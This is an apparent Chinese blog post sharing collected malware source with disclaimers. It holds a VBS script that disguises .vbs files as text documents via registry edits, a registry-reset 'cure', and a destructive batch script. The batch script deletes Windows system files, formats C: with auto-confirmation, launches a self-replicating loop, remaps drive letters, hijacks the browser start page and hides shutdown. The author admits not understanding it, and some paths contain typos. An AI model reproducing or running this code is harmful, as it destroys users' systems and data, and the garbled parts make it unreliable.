大家好,那今天小编的要给大家分享一个我搜集的vbs病毒。
这个病毒仅供参考,在还没有读懂源码之前(因为我是搜集来的代码,所以其实我自己也不懂,嘿嘿嘿......望大佬指教。),请不要运行代码!!(很重要)
有一点,这个病毒是我供给大家学习的,请不要用作非法用途,造成任何后果与本人无关。
那话不多说,直接上源码:
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\","shell32.dll,-152"
r.Regwrite "HKLM\Software\classes\vbsfile\","文本文档"
如果要运行这个程序的话,建议到虚拟机上面运行。
为了防止意外发生,我这里再附上解毒代码,如下:
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\",dir1&"\wscript.exe,2"
r.Regwrite "HKLM\Software\classes\vbsfile\","VBScript Script file"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"
这个病毒因为它有解药,所以相对!相对!相对!来讲是比较!比较!比较!安全的。(注意这上面写的是“相对”和“比较”!)不过要运行的话,还是建议大家用虚拟机运行。
以上呢就是我分享的vbs病毒!我们下期再见!
彩蛋
啊哈!你居然有耐心翻到这里,我可真是惊喜!
看到标题了吧?这里有个彩蛋,嘻嘻!
彩蛋就是bat病毒代码,这个代码可是一个破坏性的玩意,慎用!!!慎用!!!慎用!!!
它会删除你的系统文件,把关机按钮隐藏,禁用桌面单击右键!
直接上代码:
@echo off
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
del %winder%\win.ini /f
del %winder%\regedit.exe /f
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
echo y^|format C: /q
subst b: C:\
subst h: C:\
subst i: C:\
subst j: C:\
subst k: C:\
subst l: C:\
subst m: C:\
subst n: C:\
subst o: C:\
subst p: C:\
subst q: C:\
subst r: C:\
subst s: C:\
subst t: C:\
subst u: C:\
subst v: C:\
subst w: C:\
subst x: C:\
subst y: C:\
subst z: C:\
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http:// /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http:// /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.4399.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.4399.com /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
echo :p>>C:\1.bat
echo start C:\1.bat>>C:\1.bat
echo goto p>>C:\1.bat
start C:\1.bat
del %winder%\win.ini /f
del %winder%\regedit.exe /f
del %winder%\Notepad.exe /f
del %winder%\System.ini /f
del C:\bootfront.bin /f
del C:\IO.sys /f
del C:\MSDOS.sys /f
del C:\NTDETECT.COM /f
del %0 /f
咳咳!!重点来了!!
这个可怕的玩意儿,会删除你的系统文件,把关机按钮隐藏,禁用桌面单击右键的可怕玩意儿,是没有解药的!!所以你要是不小心运行了,电脑就废了......所以建议大家这个玩意最好不要去运行......
那你的电脑要是真废了,咳咳,我先声明,这跟我没有关系,所以建议大家最好不要复制这段代码然后保存到记事本里,搞后缀名为bat。。。。。。
不然要不小心点开了......那电脑真的就fei了......
2233
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
